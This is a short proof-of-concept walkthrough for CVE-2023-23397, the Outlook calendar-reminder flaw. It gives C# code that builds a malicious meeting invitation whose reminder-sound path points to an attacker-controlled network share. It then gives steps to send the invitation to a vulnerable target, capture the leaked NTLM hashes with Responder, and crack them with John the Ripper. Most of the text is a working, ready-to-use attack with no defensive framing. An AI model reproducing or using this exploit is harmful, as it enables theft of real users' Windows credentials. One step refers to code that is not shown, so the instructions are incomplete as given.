CVE-2023-23397 C# PoC
1- download the msgkit
2- edit the appointment class and add the below:
3- create a new class inside the project to set the proprieties of the msg file:
using MsgKit.Enums;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace MsgKit
{
class Program
{
static void Main(string[] args)
{
using (var appointment = new Appointment(
new Sender("moneertv@gmail.com", "moneertv"),
new Representing("moneertv@gmail.com", "moneertv"),
"CVE-2023-23397"))
{
appointment.Recipients.AddTo("moneer-1998@hotmail.com", "muneer aqraa");
appointment.Subject = "CVE-2023-23397";
appointment.Location = "Neverland";
appointment.MeetingStart = DateTime.Now.Date.AddDays(2).Date;
appointment.MeetingEnd = DateTime.Now.Date.AddDays(3).Date;
appointment.AllDay = true;
appointment.BodyText = "CVE-2023-23397";
appointment.BodyHtml = "<html><head></head><body><b>testing CVE-2023-23397</b></body></html>";
appointment.SentOn = DateTime.UtcNow;
appointment.Importance = MessageImportance.IMPORTANCE_NORMAL;
appointment.IconIndex = MessageIconIndex.UnsentMail;
appointment.PidLidReminderFileParameter = @"\\192.168.1.222\";
appointment.PidLidReminderOverride = true;
appointment.Save(@"C:\Users\Moneer\Desktop\exploits\CVE-2023-23397\MsgKit-master\generated email msg\dirty.msg");
}
}
}
}
4- change the properties for the project output type to console:
5- run the project to generate the dirty.msg
6- send the message to a vulnerable target, and wait tell the reminder of the meeting activate.
6-2- while waiting, on the kali machine which we have put its IP on the main class, run the below command to keep listening for any one who got the bait: # responder -I eth0 -v
7- once you got the hashes, store them in a file, and run the john ripper on the hashes against a wordlist (ex: rockyou)